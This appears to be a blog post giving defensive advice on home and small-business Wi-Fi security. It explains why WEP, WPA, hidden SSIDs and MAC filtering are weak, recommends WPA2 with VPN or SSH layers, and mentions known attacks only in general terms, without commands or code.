One of the weakest points of personal home security is in Wi-FI. There also have not been any new security standards released since 2004’s 802.11i. Unfortunately, routers sold today still make available security settings that are dangerously antiquated even compared to that. As with all things in security, attacks only get better.
The article on Wi-Fi security standards above lists most of the standards and defenses. For simplicity’s sake, we will quickly go through those that should not be used at all.
- WEP-based encryption is so easily broken that at this point it should be considered only marginally better than having no protection at all. Here is an example of how to break WEP-based security, for instance.
- WPA, while offering substantial improvement over WEP, is also considered insecure due to the algorithms involved.
- Hiding your SSID (the name of your wireless network) is sometimes used. I personally turned it on for a short time, but it is problematic for two reasons. First, your network is still broadcasting the name in many packets, as is the client. Second, it violates the 802.11 standard, and any time that happens with technology there can be interoperability concerns.
- Filtering based on MAC also offers minimal help. This is because changing your wireless device’s MAC is trivially easy. Given that, attackers can just listen to packets to see who is authenticating successfully, and then copy that MAC.
With those dealt with, we can look at options that should be considered.
- WPA2 Personal should be used minimally for the network.
- If you are creating a business network, you should be using WPA2 Enterprise. It offers the ability to create keys for individuals and know which users are on what devices, and if any suspicious activity is detected have a place to investigate from. It also allows you to terminate that user’s certificate without changing the password on several routers.
- Hardware tokens, smart cards, and other similar tools (such as RSA) can be used in some environments with extensive work to add rotating, per-user encryption. If your needs justify this, however, you should have full-time staff working to implement and administer the solution.
Additional layers can and should be added to whatever choice is made above. Options for doing so include encryption technologies such as SSH or VPN access. This way, it adds one more compromise in order for traffic to be deciphered.
While all of these help, it does not guarantee safety. There is at least one known attack against WPA2, known as Hole196. This allows users of the same network to gain access to what should be secure traffic or create a denial-of-service condition. There are also tools for gaining illicit access to a Wi-Fi network. Cracking a WPA2 Wi-Fi password can take several hours or more, but given that passwords may remain for years an attacker can stand to wait.
In the event that your paranoia has been justifiably turned on (for instance you are concerned about state-level actors or targeted penetration attacks)…why are you even enabling Wi-Fi? While you could use RF shielding paint or Faraday cages to contain your broadcasts to a certain physical area with some level of certainty, going to only wired connections with other security measures enabled is your best choice.